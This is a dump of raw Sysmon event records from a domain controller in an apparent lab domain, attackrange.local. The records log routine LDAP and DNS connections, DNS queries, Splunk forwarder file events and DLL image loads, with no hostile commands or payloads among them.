AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60518- 354300x80000000000000003580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.772{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58073-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.772{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58073-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.770{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local58072-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.770{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58072-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.769{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59553- 354300x80000000000000003575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.768{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55192- 354300x80000000000000003574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.753{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65244-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.752{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65244-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.750{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local65243-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.750{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local65243-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.749{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58894-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.749{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58894-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.748{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56641- 354300x80000000000000003567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.743{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58893-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.743{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1win-dc-892.attackrange.local64856-false127.0.0.1win-dc-892.attackrange.local64856- 354300x80000000000000003565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.743{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58893-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.742{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56439- 354300x80000000000000003563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.741{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local58892-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.741{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58892-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.738{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61493- 354300x80000000000000003560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49729-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49729-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.731{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49728-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.731{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49728-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.690{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49727-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49727-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49726-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49726-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.685{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49725-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.685{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49725-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.656{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49724-false10.0.1.12-8089- 354300x80000000000000003549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.652{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49723-false10.0.1.12-8089- 354300x80000000000000003548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.564{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.64-53863-false10.0.1.14win-dc-892.attackrange.local5986- 354300x80000000000000003547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:26.958{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.64-53862-false10.0.1.14win-dc-892.attackrange.local5986- 22542200x80000000000000003546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.755{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.745{266CAFBE-646A-6064-0B00-00000000AE01}856DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.695{266CAFBE-646A-6064-0B00-00000000AE01}856win-dc-892.attackrange.local010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.695{266CAFBE-646A-6064-0B00-00000000AE01}856win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;C:\Windows\System32\lsass.exe 22542200x80000000000000003542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:26.221{266CAFBE-646C-6064-1500-00000000AE01}1316win-dc-8921460-C:\Windows\System32\svchost.exe 23542300x80000000000000003541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E21185358033116E48B29342A995EF74,SHA256=FD5A785B26E7A68B6096E323E54DF18EC1042EFA207177B487F23C2848B6B3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F4A85495CEEFF2B6FECBF76FBC0C6813,SHA256=DF0A76CCCC82A772E4609AF171974746F7590DAD095D8312D6D6A0BF13083366,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22967699C2338737DE002970A6B9C310,SHA256=328F88A02F0411DB4ED223BD55489BE77E67A102D140B2B1DC7378F2756E2D1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8A08FB95FB863521F157C05D671F2252,SHA256=424FC903330E7214CC6D72FF8E81C73F20187F654369590E5FDC56E39E73D4B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=8E5A60051D99C3B11F2CEE547BD3F774,SHA256=FF3195FCE88CA2BB00442F42134CEED3BB6585EA057C468C9BF876C656D7B56B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:28.002{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:28.002{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.002{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
354300x80000000000000003611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.973{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58077-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.973{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58077-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.828{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58076-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.828{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58076-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 22542200x80000000000000003607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.801{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.793{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.785{266CAFBE-646A-6064-0B00-00000000AE01}856ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.775{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 23542300x80000000000000003603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:29.330{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D4EE2B412EC70AD8A0BC872BA2F57C4C,SHA256=019D82DD635461287D21B6CBEE29274289F45B013CA0553DDDA1D9457C2BE917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:29.330{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=A5FD6A465126EE40CB06BE9C127F3FE0,SHA256=29E018520930AFE82749E6A100B8E21060F62C24438AA6D4240B20B6BC4AF5AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.813{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58075-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.813{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58075-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58074-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58074-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.796{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local58073-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.796{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58073-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.795{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54464- 354300x80000000000000003594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.794{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55868- 734700x80000000000000003613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.174{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 734700x80000000000000003612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.549{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 23542300x80000000000000003614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.627{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCD9D0B157A435343F4AEC5B9857B73B,SHA256=FE60D4747B2D2B10EB469CB39EFAE1D1ED984A300A9BE29200ED183A964B14A8,IMPHASH=00000000000000000000000000000000falsetrue 